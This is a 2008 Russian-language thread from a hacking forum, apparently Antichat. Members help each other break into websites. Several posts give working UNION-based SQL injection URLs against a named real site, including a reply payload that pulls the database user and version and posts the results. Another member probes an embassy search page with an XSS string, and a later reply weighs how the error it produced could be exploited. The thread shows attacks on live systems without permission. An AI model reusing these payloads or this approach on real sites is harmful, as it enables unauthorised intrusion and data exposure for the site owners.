03.04.2008, 21:27
|
|
Познающий
Регистрация: 21.03.2008
Сообщений: 39
С нами:
9547025
Репутация:
21
|
|
Здравствуйте, разесните мне пожалуйста один момент, при сканировании портов утилитой Shadow Security Scanner 7, она показывает что на сервере открыто огромное количество портов, среди них очень много бекдоров, нахожу клиен к бекдору, но не один не коннектится, пробовал на разных сайтах, где открыты эти порты, ни чего не получилось.
XSpyder'ом пробывал сканить, тот вообще не работает, ни трафу не жрет, ни порты не сканирует, только нагрузку на проц создает. Помогите пожалуйста дельным советом.
|
|
|
03.04.2008, 23:07
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Spaise
В чём вопрос то?
XSpyder не работает? Или открытые порты смущают?Огромное кол-во это сколько, и главное какие?С чего ты взял ,что "среди них очень много бекдоров", что за клиент к бекдору?  |
|
|
|
04.04.2008, 01:28
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
С нами:
10009826
Репутация:
435
|
|
товарисчи напомните как вывести имя бд, для опр. таблицы, schema_name помню, а откуд забыл
|
|
|
|
04.04.2008, 01:40
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
SELECT table_schema FROM information_schema.tables WHERE table_name='imyatablici'
|
|
|
|
04.04.2008, 12:39
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами:
9626078
Репутация:
141
|
|
Код:
http://www.wfsj.org/projects/page.php?id=-62+union+select+null,null,null,null,null,null,null,null,null,null,null/*
такя проблема есть скуль возникла такая проблема с выводом заначений когда вставляю подставляю int значения
Код:
http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11/*
все норм но если подставляю Что нить типа user или from table возникает ошибка в чем проблема  |
|
|
|
04.04.2008, 12:56
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
Пробуй так
Код:
http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),4,5,6,7,8,9,10,11/*
вер. 4.1.7-nt-max
юзер. wfsj@localhost
Прочитать можно тут
http://forum.antichat.ru/showthread.php?t=19605
Да и еще, убери пробелы которые добавил форум.
Удачи.
Последний раз редактировалось Red_Red1; 04.04.2008 в 13:01..
|
|
|
|
04.04.2008, 13:12
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами:
9626078
Репутация:
141
|
|
спс
|
|
|
|
04.04.2008, 17:57
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
С нами:
10139306
Репутация:
1089
|
|
вобщем тема такая- защел я на наше посольство зарубежом(по понятным причинам умолчу в которое) и в поиске ввел "><script>alert()</script>
на что мне выдало
вот и возникает у меня вопросс- действительно это скуль? и насколько это опасно в плане IT безопасности (за Родину обидно млин) , мож предупредить их ? |
|
|
|
04.04.2008, 19:10
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами:
9626078
Репутация:
141
|
|
я таки думаю что кроме раскрытия путей больше не как и не используешь по крайней мере по скрину
ну это раскрытие может быть полезно если будет скуль с filepriv
Последний раз редактировалось MaSter GeN; 04.04.2008 в 19:14..
|
|
|
|
04.04.2008, 19:13
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами:
9681386
Репутация:
2145
|
|
типичная ошибка servlet'a имхо...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
